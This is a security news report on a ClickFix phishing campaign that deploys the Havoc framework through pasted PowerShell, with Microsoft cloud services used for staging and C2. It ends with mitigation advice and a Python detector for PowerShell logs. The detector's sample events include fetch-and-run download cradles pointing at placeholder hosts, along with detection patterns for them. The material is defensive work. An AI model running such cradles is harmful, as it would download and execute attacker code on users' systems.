New ClickFix Phishing Campaign Deploys Havoc Framework via PowerShell

Mar 4, 2025 | News





Overview

A newly discovered ClickFix phishing campaign tricks users into running malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access. Researchers at Fortinet's FortiGuard Labs identified the attack, which abuses Microsoft cloud services, including SharePoint and the Microsoft Graph API, so that payload staging and command-and-control traffic blend into legitimate Microsoft 365 activity.

ClickFix attacks use fake error messages to convince victims to manually copy and execute malicious PowerShell commands, leading to system compromise and lateral movement within corporate networks.

How the ClickFix Attack Works

1️⃣ Phishing Email & Fake Error Message

  • Victims receive a phishing email with an HTML attachment (‘Documents.html’).
  • Opening the file displays a fake OneDrive error (0x8004de86).

 

ClickFix phishing attachment (Source: BleepingComputer)

  • Users are prompted to fix the issue by copying a PowerShell command into their clipboard.

 

Phishing attachment displaying fix instructions (Source: BleepingComputer)

2️⃣ Malicious PowerShell Execution

  • The PowerShell script retrieves another script from the attacker’s SharePoint server.

 

Malicious PowerShell command that was shared as a fix (Source: BleepingComputer)

  • Sandbox Evasion: Before doing anything else, the script runs checks for signs of a sandbox or analysis environment.
  • Registry Modification: The script writes a registry value as a marker that it has already run on the host.
  • Python Deployment: If Python is not installed, the script downloads and installs it so the next-stage payload can run.

3️⃣ Deployment of the Havoc C2 Framework

  • A Python script is downloaded and executed; it loads the Havoc Demon agent into memory as an injected DLL.
  • Havoc is an open-source post-exploitation framework comparable to Cobalt Strike, used for remote control, privilege escalation and lateral movement.
  • C2 over Microsoft Graph API: the implant talks to the attacker's infrastructure through the Microsoft Graph API and the attacker-controlled SharePoint site, so command-and-control traffic looks like ordinary Microsoft 365 cloud activity.


Why This Attack Is Dangerous

  • Social Engineering: The victim runs the command by hand, so no exploit, macro or executable attachment has to get past the mail gateway.
  • Abuse of Trusted Microsoft Services: SharePoint and the Graph API are used to stage payloads, deliver commands and move data, infrastructure that cannot simply be blocked at the perimeter.
  • Evasive Network Traffic: C2 traffic hides inside legitimate cloud-service connections, which network-based detection rarely flags.
  • Havoc Post-Exploitation: The attacker gains full remote access to the host, a foothold that can lead to wider network compromise, data theft and ransomware deployment.




How to Protect Against ClickFix Attacks

🔒 User Awareness Training: Teach employees that no legitimate error message asks them to paste a command into a PowerShell terminal, and to report any page or attachment that does.
🛡️ Restrict PowerShell Execution: Turn on PowerShell Script Block Logging (Event ID 4104) and Module Logging, restrict script execution with AppLocker or WDAC policies where possible, and keep AMSI-integrated antivirus enabled so obfuscated download cradles are inspected at runtime.
📊 Monitor Microsoft Cloud Services: Enable audit logging for Microsoft Graph API and SharePoint activity and look for tenants, sites and file-access patterns that do not match normal business use.
🚨 Endpoint Security & EDR: Use behavioral detection for PowerShell download cradles (Invoke-WebRequest or iwr piped into Invoke-Expression), unexpected Python installations, and PowerShell or Python processes connecting to *.sharepoint.com or graph.microsoft.com.
🔍 Email Filtering & Attachment Analysis: Block or sandbox HTML attachments and inspect embedded JavaScript for clipboard-copy logic and PowerShell strings.
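The following Python script is an added example, not code from the article or from FortiGuard's research. It applies the detection idea behind the attack-chain steps above and the logging and EDR advice in this list to PowerShell Script Block Logging records (Event ID 4104): it looks for the ClickFix signature, a download cradle piped into Invoke-Expression, often with evasion switches, fetching the next stage from a trusted Microsoft cloud host. The sample events, hostnames, tenant name and URLs are placeholders constructed for the example, and the indicator weights and verdict rules are assumptions to tune against your own logs.

```python
"""Triage PowerShell Script Block Logging records (Event ID 4104) for the
ClickFix pattern: a download cradle piped into Invoke-Expression, often with
evasion switches, pulling the next stage from a trusted Microsoft cloud host.

The sample events below are constructed for this example; the hostnames,
tenant name and paths are placeholders, not indicators from the campaign.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample records: {event id, workstation, logged script text}.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-0412",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length"},
    {"id": 2, "host": "WS-0412",
     "script": "powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden "
               "-c \"iex (iwr 'https://example-tenant.sharepoint.com/sites/s/Shared%20Documents/fix.ps1' -UseBasicParsing).Content\""},
    {"id": 3, "host": "WS-0207",
     "script": "$c = New-Object Net.WebClient; iex $c.DownloadString('http://203.0.113.10/stage.ps1')"},
    {"id": 4, "host": "WS-0207",
     "script": "Invoke-WebRequest -Uri https://graph.microsoft.com/v1.0/me/drive/root/children -Headers $h"},
    {"id": 5, "host": "WS-0311",
     "script": "Invoke-RestMethod https://internal.example/api/health"},
]

# Each pattern matches one trait of the one-liner a ClickFix lure asks the victim to paste.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Net\.WebClient)\b", re.I),
    "inline_execution": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "evasion_flags": re.compile(
        r"-(?:windowstyle\s+hidden|w\s+hidden|noprofile|nop|executionpolicy\s+bypass|ep\s+bypass|encodedcommand|enc)\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def microsoft_cloud_hosts(script: str) -> list:
    """Return the SharePoint / Graph API hosts referenced by URLs in the script text."""
    hosts = []
    for url in URL_RE.findall(script):
        host = (urlparse(url).hostname or "").lower()
        if host == "graph.microsoft.com" or host.endswith(".sharepoint.com"):
            hosts.append(host)
    return hosts


@dataclass
class Finding:
    event_id: int
    host: str
    traits: list
    cloud_hosts: list
    score: int
    verdict: str


def analyse(event: dict) -> Finding:
    """Score one 4104 record and assign a verdict (weights are assumptions, tune them)."""
    script = event["script"]
    traits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    cloud = microsoft_cloud_hosts(script)
    score = (2 * ("download_cradle" in traits)
             + 2 * ("inline_execution" in traits)
             + ("evasion_flags" in traits)
             + bool(cloud))
    if "download_cradle" in traits and "inline_execution" in traits:
        verdict = "clickfix-suspect"   # fetch-and-run in one line is the lure's signature
    elif "download_cradle" in traits and (cloud or "evasion_flags" in traits):
        verdict = "review"             # cloud staging or hidden window, but no inline execution
    else:
        verdict = "benign"
    return Finding(event["id"], event["host"], traits, cloud, score, verdict)


def triage(events=SAMPLE_EVENTS) -> dict:
    """Group event ids by verdict so the highest-severity bucket is easy to route."""
    buckets = {"clickfix-suspect": [], "review": [], "benign": []}
    for ev in events:
        f = analyse(ev)
        buckets[f.verdict].append(f.event_id)
    return buckets


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        f = analyse(ev)
        print(f"{f.event_id} {f.host} {f.verdict:17} score={f.score} "
              f"traits={f.traits} cloud={f.cloud_hosts}")
```

Run it directly to print a verdict per sample event. The fetch-and-run combination is the decisive trait: event 2 (SharePoint-hosted stage with hidden-window and bypass switches) and event 3 (a plain WebClient cradle) are both flagged, while a lone Graph API request is only routed for review, because Microsoft 365 tooling issues those legitimately, which is exactly what the campaign counts on.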


Source: bleepingcomputer.com
